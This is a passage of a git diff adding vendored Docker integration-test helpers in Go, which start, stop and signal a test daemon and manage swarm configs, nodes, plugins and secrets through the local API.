"cannot run daemon when remote daemon") + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + // sampling current time minus a minute so to now have false positive in case of delays + now := time.Now().Truncate(time.Minute) + + name := t.Name() + _, err := client.VolumeCreate(ctx, volumetypes.VolumeCreateBody{ + Name: name, + }) + assert.NilError(t, err) + + vol, err := client.VolumeInspect(ctx, name) + assert.NilError(t, err) + + expected := types.Volume{ + // Ignore timestamp of CreatedAt + CreatedAt: vol.CreatedAt, + Driver: "local", + Scope: "local", + Name: name, + Mountpoint: fmt.Sprintf("%s/volumes/%s/_data", testEnv.DaemonInfo.DockerRootDir, name), + } + assert.Check(t, is.DeepEqual(vol, expected, cmpopts.EquateEmpty())) + + // comparing CreatedAt field time for the new volume to now. Removing a minute from both to avoid false positive + testCreatedAt, err := time.Parse(time.RFC3339, strings.TrimSpace(vol.CreatedAt)) + assert.NilError(t, err) + testCreatedAt = testCreatedAt.Truncate(time.Minute) + assert.Check(t, is.Equal(testCreatedAt.Equal(now), true), "Time Volume is CreatedAt not equal to current time") +} + +func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) { + if testEnv.OSType == "windows" { + return "c:", `\` + } + return "", "/" +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/config.go b/vendor/github.com/docker/docker/internal/test/daemon/config.go new file mode 100644 index 0000000000..ce99222b37 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/config.go @@ -0,0 +1,82 @@ +package daemon + +import ( + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +// ConfigConstructor defines a swarm config constructor +type ConfigConstructor func(*swarm.Config) + +// CreateConfig creates a config given the specified spec +func (d *Daemon) CreateConfig(t assert.TestingT, configSpec swarm.ConfigSpec) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + scr, err := cli.ConfigCreate(context.Background(), configSpec) + assert.NilError(t, err) + return scr.ID +} + +// ListConfigs returns the list of the current swarm configs +func (d *Daemon) ListConfigs(t assert.TestingT) []swarm.Config { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + configs, err := cli.ConfigList(context.Background(), types.ConfigListOptions{}) + assert.NilError(t, err) + return configs +} + +// GetConfig returns a swarm config identified by the specified id +func (d *Daemon) GetConfig(t assert.TestingT, id string) *swarm.Config { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + config, _, err := cli.ConfigInspectWithRaw(context.Background(), id) + assert.NilError(t, err) + return &config +} + +// DeleteConfig removes the swarm config identified by the specified id +func (d *Daemon) DeleteConfig(t assert.TestingT, id string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + err := cli.ConfigRemove(context.Background(), id) + assert.NilError(t, err) +} + +// UpdateConfig updates the swarm config identified by the specified id +// Currently, only label update is supported. +func (d *Daemon) UpdateConfig(t assert.TestingT, id string, f ...ConfigConstructor) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + config := d.GetConfig(t, id) + for _, fn := range f { + fn(config) + } + + err := cli.ConfigUpdate(context.Background(), config.ID, config.Version, config.Spec) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/container.go b/vendor/github.com/docker/docker/internal/test/daemon/container.go new file mode 100644 index 0000000000..3aa69e195c --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/container.go @@ -0,0 +1,40 @@ +package daemon + +import ( + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +// ActiveContainers returns the list of ids of the currently running containers +func (d *Daemon) ActiveContainers(t assert.TestingT) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + containers, err := cli.ContainerList(context.Background(), types.ContainerListOptions{}) + assert.NilError(t, err) + + ids := make([]string, len(containers)) + for i, c := range containers { + ids[i] = c.ID + } + return ids +} + +// FindContainerIP returns the ip of the specified container +func (d *Daemon) FindContainerIP(t assert.TestingT, id string) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + i, err := cli.ContainerInspect(context.Background(), id) + assert.NilError(t, err) + return i.NetworkSettings.IPAddress +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/daemon.go b/vendor/github.com/docker/docker/internal/test/daemon/daemon.go new file mode 100644 index 0000000000..98f1ee1b08 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/daemon.go @@ -0,0 +1,681 @@ +package daemon // import "github.com/docker/docker/internal/test/daemon" + +import ( + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "os" + "os/exec" + "path/filepath" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" + "github.com/pkg/errors" + "gotest.tools/assert" +) + +type testingT interface { + assert.TestingT + logT + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +const defaultDockerdBinary = "dockerd" + +var errDaemonNotStarted = errors.New("daemon not started") + +// SockRoot holds the path of the default docker integration daemon socket +var SockRoot = filepath.Join(os.TempDir(), "docker-integration") + +type clientConfig struct { + transport *http.Transport + scheme string + addr string +} + +// Daemon represents a Docker daemon for the testing framework +type Daemon struct { + GlobalFlags []string + Root string + Folder string + Wait chan error + UseDefaultHost bool + UseDefaultTLSHost bool + + id string + logFile *os.File + cmd *exec.Cmd + storageDriver string + userlandProxy bool + execRoot string + experimental bool + init bool + dockerdBinary string + log logT + + // swarm related field + swarmListenAddr string + SwarmPort int // FIXME(vdemeester) should probably not be exported + + // cached information + CachedInfo types.Info +} + +// New returns a Daemon instance to be used for testing. +// This will create a directory such as d123456789 in the folder specified by $DOCKER_INTEGRATION_DAEMON_DEST or $DEST. +// The daemon will not automatically start. +func New(t testingT, ops ...func(*Daemon)) *Daemon { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + dest := os.Getenv("DOCKER_INTEGRATION_DAEMON_DEST") + if dest == "" { + dest = os.Getenv("DEST") + } + assert.Check(t, dest != "", "Please set the DOCKER_INTEGRATION_DAEMON_DEST or the DEST environment variable") + + storageDriver := os.Getenv("DOCKER_GRAPHDRIVER") + + assert.NilError(t, os.MkdirAll(SockRoot, 0700), "could not create daemon socket root") + + id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID())) + dir := filepath.Join(dest, id) + daemonFolder, err := filepath.Abs(dir) + assert.NilError(t, err, "Could not make %q an absolute path", dir) + daemonRoot := filepath.Join(daemonFolder, "root") + + assert.NilError(t, os.MkdirAll(daemonRoot, 0755), "Could not create daemon root %q", dir) + + userlandProxy := true + if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" { + if val, err := strconv.ParseBool(env); err != nil { + userlandProxy = val + } + } + d := &Daemon{ + id: id, + Folder: daemonFolder, + Root: daemonRoot, + storageDriver: storageDriver, + userlandProxy: userlandProxy, + execRoot: filepath.Join(os.TempDir(), "docker-execroot", id), + dockerdBinary: defaultDockerdBinary, + swarmListenAddr: defaultSwarmListenAddr, + SwarmPort: DefaultSwarmPort, + log: t, + } + + for _, op := range ops { + op(d) + } + + return d +} + +// RootDir returns the root directory of the daemon. +func (d *Daemon) RootDir() string { + return d.Root +} + +// ID returns the generated id of the daemon +func (d *Daemon) ID() string { + return d.id +} + +// StorageDriver returns the configured storage driver of the daemon +func (d *Daemon) StorageDriver() string { + return d.storageDriver +} + +// Sock returns the socket path of the daemon +func (d *Daemon) Sock() string { + return fmt.Sprintf("unix://" + d.sockPath()) +} + +func (d *Daemon) sockPath() string { + return filepath.Join(SockRoot, d.id+".sock") +} + +// LogFileName returns the path the daemon's log file +func (d *Daemon) LogFileName() string { + return d.logFile.Name() +} + +// ReadLogFile returns the content of the daemon log file +func (d *Daemon) ReadLogFile() ([]byte, error) { + return ioutil.ReadFile(d.logFile.Name()) +} + +// NewClient creates new client based on daemon's socket path +// FIXME(vdemeester): replace NewClient with NewClientT +func (d *Daemon) NewClient() (*client.Client, error) { + return client.NewClientWithOpts( + client.FromEnv, + client.WithHost(d.Sock())) +} + +// NewClientT creates new client based on daemon's socket path +// FIXME(vdemeester): replace NewClient with NewClientT +func (d *Daemon) NewClientT(t assert.TestingT) *client.Client { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + c, err := client.NewClientWithOpts( + client.FromEnv, + client.WithHost(d.Sock())) + assert.NilError(t, err, "cannot create daemon client") + return c +} + +// Cleanup cleans the daemon files : exec root (network namespaces, ...), swarmkit files +func (d *Daemon) Cleanup(t testingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + // Cleanup swarmkit wal files if present + cleanupRaftDir(t, d.Root) + cleanupNetworkNamespace(t, d.execRoot) +} + +// Start starts the daemon and return once it is ready to receive requests. +func (d *Daemon) Start(t testingT, args ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + if err := d.StartWithError(args...); err != nil { + t.Fatalf("Error starting daemon with arguments: %v", args) + } +} + +// StartWithError starts the daemon and return once it is ready to receive requests. +// It returns an error in case it couldn't start. +func (d *Daemon) StartWithError(args ...string) error { + logFile, err := os.OpenFile(filepath.Join(d.Folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600) + if err != nil { + return errors.Wrapf(err, "[%s] Could not create %s/docker.log", d.id, d.Folder) + } + + return d.StartWithLogFile(logFile, args...) +} + +// StartWithLogFile will start the daemon and attach its streams to a given file. +func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error { + d.handleUserns() + dockerdBinary, err := exec.LookPath(d.dockerdBinary) + if err != nil { + return errors.Wrapf(err, "[%s] could not find docker binary in $PATH", d.id) + } + args := append(d.GlobalFlags, + "--containerd", "/var/run/docker/containerd/docker-containerd.sock", + "--data-root", d.Root, + "--exec-root", d.execRoot, + "--pidfile", fmt.Sprintf("%s/docker.pid", d.Folder), + fmt.Sprintf("--userland-proxy=%t", d.userlandProxy), + ) + if d.experimental { + args = append(args, "--experimental") + } + if d.init { + args = append(args, "--init") + } + if !(d.UseDefaultHost || d.UseDefaultTLSHost) { + args = append(args, []string{"--host", d.Sock()}...) + } + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + args = append(args, []string{"--userns-remap", root}...) + } + + // If we don't explicitly set the log-level or debug flag(-D) then + // turn on debug mode + foundLog := false + foundSd := false + for _, a := range providedArgs { + if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") { + foundLog = true + } + if strings.Contains(a, "--storage-driver") { + foundSd = true + } + } + if !foundLog { + args = append(args, "--debug") + } + if d.storageDriver != "" && !foundSd { + args = append(args, "--storage-driver", d.storageDriver) + } + + args = append(args, providedArgs...) + d.cmd = exec.Command(dockerdBinary, args...) + d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1") + d.cmd.Stdout = out + d.cmd.Stderr = out + d.logFile = out + + if err := d.cmd.Start(); err != nil { + return errors.Errorf("[%s] could not start daemon container: %v", d.id, err) + } + + wait := make(chan error) + + go func() { + wait <- d.cmd.Wait() + d.log.Logf("[%s] exiting daemon", d.id) + close(wait) + }() + + d.Wait = wait + + tick := time.Tick(500 * time.Millisecond) + // make sure daemon is ready to receive requests + startTime := time.Now().Unix() + for { + d.log.Logf("[%s] waiting for daemon to start", d.id) + if time.Now().Unix()-startTime > 5 { + // After 5 seconds, give up + return errors.Errorf("[%s] Daemon exited and never started", d.id) + } + select { + case <-time.After(2 * time.Second): + return errors.Errorf("[%s] timeout: daemon does not respond", d.id) + case <-tick: + clientConfig, err := d.getClientConfig() + if err != nil { + return err + } + + client := &http.Client{ + Transport: clientConfig.transport, + } + + req, err := http.NewRequest("GET", "/_ping", nil) + if err != nil { + return errors.Wrapf(err, "[%s] could not create new request", d.id) + } + req.URL.Host = clientConfig.addr + req.URL.Scheme = clientConfig.scheme + resp, err := client.Do(req) + if err != nil { + continue + } + resp.Body.Close() + if resp.StatusCode != http.StatusOK { + d.log.Logf("[%s] received status != 200 OK: %s\n", d.id, resp.Status) + } + d.log.Logf("[%s] daemon started\n", d.id) + d.Root, err = d.queryRootDir() + if err != nil { + return errors.Errorf("[%s] error querying daemon for root directory: %v", d.id, err) + } + return nil + case <-d.Wait: + return errors.Errorf("[%s] Daemon exited during startup", d.id) + } + } +} + +// StartWithBusybox will first start the daemon with Daemon.Start() +// then save the busybox image from the main daemon and load it into this Daemon instance. +func (d *Daemon) StartWithBusybox(t testingT, arg ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + d.Start(t, arg...) + d.LoadBusybox(t) +} + +// Kill will send a SIGKILL to the daemon +func (d *Daemon) Kill() error { + if d.cmd == nil || d.Wait == nil { + return errDaemonNotStarted + } + + defer func() { + d.logFile.Close() + d.cmd = nil + }() + + if err := d.cmd.Process.Kill(); err != nil { + return err + } + + return os.Remove(fmt.Sprintf("%s/docker.pid", d.Folder)) +} + +// Pid returns the pid of the daemon +func (d *Daemon) Pid() int { + return d.cmd.Process.Pid +} + +// Interrupt stops the daemon by sending it an Interrupt signal +func (d *Daemon) Interrupt() error { + return d.Signal(os.Interrupt) +} + +// Signal sends the specified signal to the daemon if running +func (d *Daemon) Signal(signal os.Signal) error { + if d.cmd == nil || d.Wait == nil { + return errDaemonNotStarted + } + return d.cmd.Process.Signal(signal) +} + +// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its +// stack to its log file and exit +// This is used primarily for gathering debug information on test timeout +func (d *Daemon) DumpStackAndQuit() { + if d.cmd == nil || d.cmd.Process == nil { + return + } + SignalDaemonDump(d.cmd.Process.Pid) +} + +// Stop will send a SIGINT every second and wait for the daemon to stop. +// If it times out, a SIGKILL is sent. +// Stop will not delete the daemon directory. If a purged daemon is needed, +// instantiate a new one with NewDaemon. +// If an error occurs while starting the daemon, the test will fail. +func (d *Daemon) Stop(t testingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + err := d.StopWithError() + if err != nil { + if err != errDaemonNotStarted { + t.Fatalf("Error while stopping the daemon %s : %v", d.id, err) + } else { + t.Logf("Daemon %s is not started", d.id) + } + } +} + +// StopWithError will send a SIGINT every second and wait for the daemon to stop. +// If it timeouts, a SIGKILL is sent. +// Stop will not delete the daemon directory. If a purged daemon is needed, +// instantiate a new one with NewDaemon. +func (d *Daemon) StopWithError() error { + if d.cmd == nil || d.Wait == nil { + return errDaemonNotStarted + } + + defer func() { + d.logFile.Close() + d.cmd = nil + }() + + i := 1 + tick := time.Tick(time.Second) + + if err := d.cmd.Process.Signal(os.Interrupt); err != nil { + if strings.Contains(err.Error(), "os: process already finished") { + return errDaemonNotStarted + } + return errors.Errorf("could not send signal: %v", err) + } +out1: + for { + select { + case err := <-d.Wait: + return err + case <-time.After(20 * time.Second): + // time for stopping jobs and run onShutdown hooks + d.log.Logf("[%s] daemon started", d.id) + break out1 + } + } + +out2: + for { + select { + case err := <-d.Wait: + return err + case <-tick: + i++ + if i > 5 { + d.log.Logf("tried to interrupt daemon for %d times, now try to kill it", i) + break out2 + } + d.log.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid) + if err := d.cmd.Process.Signal(os.Interrupt); err != nil { + return errors.Errorf("could not send signal: %v", err) + } + } + } + + if err := d.cmd.Process.Kill(); err != nil { + d.log.Logf("Could not kill daemon: %v", err) + return err + } + + d.cmd.Wait() + + return os.Remove(fmt.Sprintf("%s/docker.pid", d.Folder)) +} + +// Restart will restart the daemon by first stopping it and the starting it. +// If an error occurs while starting the daemon, the test will fail. +func (d *Daemon) Restart(t testingT, args ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + d.Stop(t) + d.Start(t, args...) +} + +// RestartWithError will restart the daemon by first stopping it and then starting it. +func (d *Daemon) RestartWithError(arg ...string) error { + if err := d.StopWithError(); err != nil { + return err + } + return d.StartWithError(arg...) +} + +func (d *Daemon) handleUserns() { + // in the case of tests running a user namespace-enabled daemon, we have resolved + // d.Root to be the actual final path of the graph dir after the "uid.gid" of + // remapped root is added--we need to subtract it from the path before calling + // start or else we will continue making subdirectories rather than truly restarting + // with the same location/root: + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + d.Root = filepath.Dir(d.Root) + } +} + +// ReloadConfig asks the daemon to reload its configuration +func (d *Daemon) ReloadConfig() error { + if d.cmd == nil || d.cmd.Process == nil { + return errors.New("daemon is not running") + } + + errCh := make(chan error) + started := make(chan struct{}) + go func() { + _, body, err := request.Get("/events", request.Host(d.Sock())) + close(started) + if err != nil { + errCh <- err + } + defer body.Close() + dec := json.NewDecoder(body) + for { + var e events.Message + if err := dec.Decode(&e); err != nil { + errCh <- err + return + } + if e.Type != events.DaemonEventType { + continue + } + if e.Action != "reload" { + continue + } + close(errCh) // notify that we are done + return + } + }() + + <-started + if err := signalDaemonReload(d.cmd.Process.Pid); err != nil { + return errors.Errorf("error signaling daemon reload: %v", err) + } + select { + case err := <-errCh: + if err != nil { + return errors.Errorf("error waiting for daemon reload event: %v", err) + } + case <-time.After(30 * time.Second): + return errors.New("timeout waiting for daemon reload event") + } + return nil +} + +// LoadBusybox image into the daemon +func (d *Daemon) LoadBusybox(t assert.TestingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + clientHost, err := client.NewEnvClient() + assert.NilError(t, err, "failed to create client") + defer clientHost.Close() + + ctx := context.Background() + reader, err := clientHost.ImageSave(ctx, []string{"busybox:latest"}) + assert.NilError(t, err, "failed to download busybox") + defer reader.Close() + + client, err := d.NewClient() + assert.NilError(t, err, "failed to create client") + defer client.Close() + + resp, err := client.ImageLoad(ctx, reader, true) + assert.NilError(t, err, "failed to load busybox") + defer resp.Body.Close() +} + +func (d *Daemon) getClientConfig() (*clientConfig, error) { + var ( + transport *http.Transport + scheme string + addr string + proto string + ) + if d.UseDefaultTLSHost { + option := &tlsconfig.Options{ + CAFile: "fixtures/https/ca.pem", + CertFile: "fixtures/https/client-cert.pem", + KeyFile: "fixtures/https/client-key.pem", + } + tlsConfig, err := tlsconfig.Client(*option) + if err != nil { + return nil, err + } + transport = &http.Transport{ + TLSClientConfig: tlsConfig, + } + addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort) + scheme = "https" + proto = "tcp" + } else if d.UseDefaultHost { + addr = opts.DefaultUnixSocket + proto = "unix" + scheme = "http" + transport = &http.Transport{} + } else { + addr = d.sockPath() + proto = "unix" + scheme = "http" + transport = &http.Transport{} + } + + if err := sockets.ConfigureTransport(transport, proto, addr); err != nil { + return nil, err + } + transport.DisableKeepAlives = true + + return &clientConfig{ + transport: transport, + scheme: scheme, + addr: addr, + }, nil +} + +func (d *Daemon) queryRootDir() (string, error) { + // update daemon root by asking /info endpoint (to support user + // namespaced daemon with root remapped uid.gid directory) + clientConfig, err := d.getClientConfig() + if err != nil { + return "", err + } + + client := &http.Client{ + Transport: clientConfig.transport, + } + + req, err := http.NewRequest("GET", "/info", nil) + if err != nil { + return "", err + } + req.Header.Set("Content-Type", "application/json") + req.URL.Host = clientConfig.addr + req.URL.Scheme = clientConfig.scheme + + resp, err := client.Do(req) + if err != nil { + return "", err + } + body := ioutils.NewReadCloserWrapper(resp.Body, func() error { + return resp.Body.Close() + }) + + type Info struct { + DockerRootDir string + } + var b []byte + var i Info + b, err = request.ReadBody(body) + if err == nil && resp.StatusCode == http.StatusOK { + // read the docker root dir + if err = json.Unmarshal(b, &i); err == nil { + return i.DockerRootDir, nil + } + } + return "", err +} + +// Info returns the info struct for this daemon +func (d *Daemon) Info(t assert.TestingT) types.Info { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + apiclient, err := d.NewClient() + assert.NilError(t, err) + info, err := apiclient.Info(context.Background()) + assert.NilError(t, err) + return info +} + +func cleanupRaftDir(t testingT, rootPath string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + walDir := filepath.Join(rootPath, "swarm/raft/wal") + if err := os.RemoveAll(walDir); err != nil { + t.Logf("error removing %v: %v", walDir, err) + } +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go b/vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go new file mode 100644 index 0000000000..9dd9e36f0c --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/daemon_unix.go @@ -0,0 +1,39 @@ +// +build !windows + +package daemon // import "github.com/docker/docker/internal/test/daemon" + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/internal/test" + "golang.org/x/sys/unix" +) + +func cleanupNetworkNamespace(t testingT, execRoot string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + // Cleanup network namespaces in the exec root of this + // daemon because this exec root is specific to this + // daemon instance and has no chance of getting + // cleaned up when a new daemon is instantiated with a + // new exec root. + netnsPath := filepath.Join(execRoot, "netns") + filepath.Walk(netnsPath, func(path string, info os.FileInfo, err error) error { + if err := unix.Unmount(path, unix.MNT_FORCE); err != nil { + t.Logf("unmount of %s failed: %v", path, err) + } + os.Remove(path) + return nil + }) +} + +// SignalDaemonDump sends a signal to the daemon to write a dump file +func SignalDaemonDump(pid int) { + unix.Kill(pid, unix.SIGQUIT) +} + +func signalDaemonReload(pid int) error { + return unix.Kill(pid, unix.SIGHUP) +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go b/vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go new file mode 100644 index 0000000000..cb6bb6a4cb --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/daemon_windows.go @@ -0,0 +1,25 @@ +package daemon // import "github.com/docker/docker/internal/test/daemon" + +import ( + "fmt" + "strconv" + + "golang.org/x/sys/windows" +) + +// SignalDaemonDump sends a signal to the daemon to write a dump file +func SignalDaemonDump(pid int) { + ev, _ := windows.UTF16PtrFromString("Global\\docker-daemon-" + strconv.Itoa(pid)) + h2, err := windows.OpenEvent(0x0002, false, ev) + if h2 == 0 || err != nil { + return + } + windows.PulseEvent(h2) +} + +func signalDaemonReload(pid int) error { + return fmt.Errorf("daemon reload not supported") +} + +func cleanupNetworkNamespace(t testingT, execRoot string) { +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/node.go b/vendor/github.com/docker/docker/internal/test/daemon/node.go new file mode 100644 index 0000000000..d9263a7f29 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/node.go @@ -0,0 +1,82 @@ +package daemon + +import ( + "context" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +// NodeConstructor defines a swarm node constructor +type NodeConstructor func(*swarm.Node) + +// GetNode returns a swarm node identified by the specified id +func (d *Daemon) GetNode(t assert.TestingT, id string) *swarm.Node { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + node, _, err := cli.NodeInspectWithRaw(context.Background(), id) + assert.NilError(t, err) + assert.Check(t, node.ID == id) + return &node +} + +// RemoveNode removes the specified node +func (d *Daemon) RemoveNode(t assert.TestingT, id string, force bool) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + options := types.NodeRemoveOptions{ + Force: force, + } + err := cli.NodeRemove(context.Background(), id, options) + assert.NilError(t, err) +} + +// UpdateNode updates a swarm node with the specified node constructor +func (d *Daemon) UpdateNode(t assert.TestingT, id string, f ...NodeConstructor) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + for i := 0; ; i++ { + node := d.GetNode(t, id) + for _, fn := range f { + fn(node) + } + + err := cli.NodeUpdate(context.Background(), node.ID, node.Version, node.Spec) + if i < 10 && err != nil && strings.Contains(err.Error(), "update out of sequence") { + time.Sleep(100 * time.Millisecond) + continue + } + assert.NilError(t, err) + return + } +} + +// ListNodes returns the list of the current swarm nodes +func (d *Daemon) ListNodes(t assert.TestingT) []swarm.Node { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + nodes, err := cli.NodeList(context.Background(), types.NodeListOptions{}) + assert.NilError(t, err) + + return nodes +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/ops.go b/vendor/github.com/docker/docker/internal/test/daemon/ops.go new file mode 100644 index 0000000000..34db073b57 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/ops.go @@ -0,0 +1,44 @@ +package daemon + +import "github.com/docker/docker/internal/test/environment" + +// WithExperimental sets the daemon in experimental mode +func WithExperimental(d *Daemon) { + d.experimental = true + d.init = true +} + +// WithInit sets the daemon init +func WithInit(d *Daemon) { + d.init = true +} + +// WithDockerdBinary sets the dockerd binary to the specified one +func WithDockerdBinary(dockerdBinary string) func(*Daemon) { + return func(d *Daemon) { + d.dockerdBinary = dockerdBinary + } +} + +// WithSwarmPort sets the swarm port to use for swarm mode +func WithSwarmPort(port int) func(*Daemon) { + return func(d *Daemon) { + d.SwarmPort = port + } +} + +// WithSwarmListenAddr sets the swarm listen addr to use for swarm mode +func WithSwarmListenAddr(listenAddr string) func(*Daemon) { + return func(d *Daemon) { + d.swarmListenAddr = listenAddr + } +} + +// WithEnvironment sets options from internal/test/environment.Execution struct +func WithEnvironment(e environment.Execution) func(*Daemon) { + return func(d *Daemon) { + if e.DaemonInfo.ExperimentalBuild { + d.experimental = true + } + } +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/plugin.go b/vendor/github.com/docker/docker/internal/test/daemon/plugin.go new file mode 100644 index 0000000000..63bbeed219 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/plugin.go @@ -0,0 +1,77 @@ +package daemon + +import ( + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "gotest.tools/poll" +) + +// PluginIsRunning provides a poller to check if the specified plugin is running +func (d *Daemon) PluginIsRunning(name string) func(poll.LogT) poll.Result { + return withClient(d, withPluginInspect(name, func(plugin *types.Plugin, t poll.LogT) poll.Result { + if plugin.Enabled { + return poll.Success() + } + return poll.Continue("plugin %q is not enabled", name) + })) +} + +// PluginIsNotRunning provides a poller to check if the specified plugin is not running +func (d *Daemon) PluginIsNotRunning(name string) func(poll.LogT) poll.Result { + return withClient(d, withPluginInspect(name, func(plugin *types.Plugin, t poll.LogT) poll.Result { + if !plugin.Enabled { + return poll.Success() + } + return poll.Continue("plugin %q is enabled", name) + })) +} + +// PluginIsNotPresent provides a poller to check if the specified plugin is not present +func (d *Daemon) PluginIsNotPresent(name string) func(poll.LogT) poll.Result { + return withClient(d, func(c client.APIClient, t poll.LogT) poll.Result { + _, _, err := c.PluginInspectWithRaw(context.Background(), name) + if client.IsErrNotFound(err) { + return poll.Success() + } + if err != nil { + return poll.Error(err) + } + return poll.Continue("plugin %q exists", name) + }) +} + +// PluginReferenceIs provides a poller to check if the specified plugin has the specified reference +func (d *Daemon) PluginReferenceIs(name, expectedRef string) func(poll.LogT) poll.Result { + return withClient(d, withPluginInspect(name, func(plugin *types.Plugin, t poll.LogT) poll.Result { + if plugin.PluginReference == expectedRef { + return poll.Success() + } + return poll.Continue("plugin %q reference is not %q", name, expectedRef) + })) +} + +func withPluginInspect(name string, f func(*types.Plugin, poll.LogT) poll.Result) func(client.APIClient, poll.LogT) poll.Result { + return func(c client.APIClient, t poll.LogT) poll.Result { + plugin, _, err := c.PluginInspectWithRaw(context.Background(), name) + if client.IsErrNotFound(err) { + return poll.Continue("plugin %q not found", name) + } + if err != nil { + return poll.Error(err) + } + return f(plugin, t) + } + +} + +func withClient(d *Daemon, f func(client.APIClient, poll.LogT) poll.Result) func(poll.LogT) poll.Result { + return func(t poll.LogT) poll.Result { + c, err := d.NewClient() + if err != nil { + poll.Error(err) + } + return f(c, t) + } +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/secret.go b/vendor/github.com/docker/docker/internal/test/daemon/secret.go new file mode 100644 index 0000000000..f3db7a4260 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/secret.go @@ -0,0 +1,84 @@ +package daemon + +import ( + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +// SecretConstructor defines a swarm secret constructor +type SecretConstructor func(*swarm.Secret) + +// CreateSecret creates a secret given the specified spec +func (d *Daemon) CreateSecret(t assert.TestingT, secretSpec swarm.SecretSpec) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + scr, err := cli.SecretCreate(context.Background(), secretSpec) + assert.NilError(t, err) + + return scr.ID +} + +// ListSecrets returns the list of the current swarm secrets +func (d *Daemon) ListSecrets(t assert.TestingT) []swarm.Secret { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + secrets, err := cli.SecretList(context.Background(), types.SecretListOptions{}) + assert.NilError(t, err) + return secrets +} + +// GetSecret returns a swarm secret identified by the specified id +func (d *Daemon) GetSecret(t 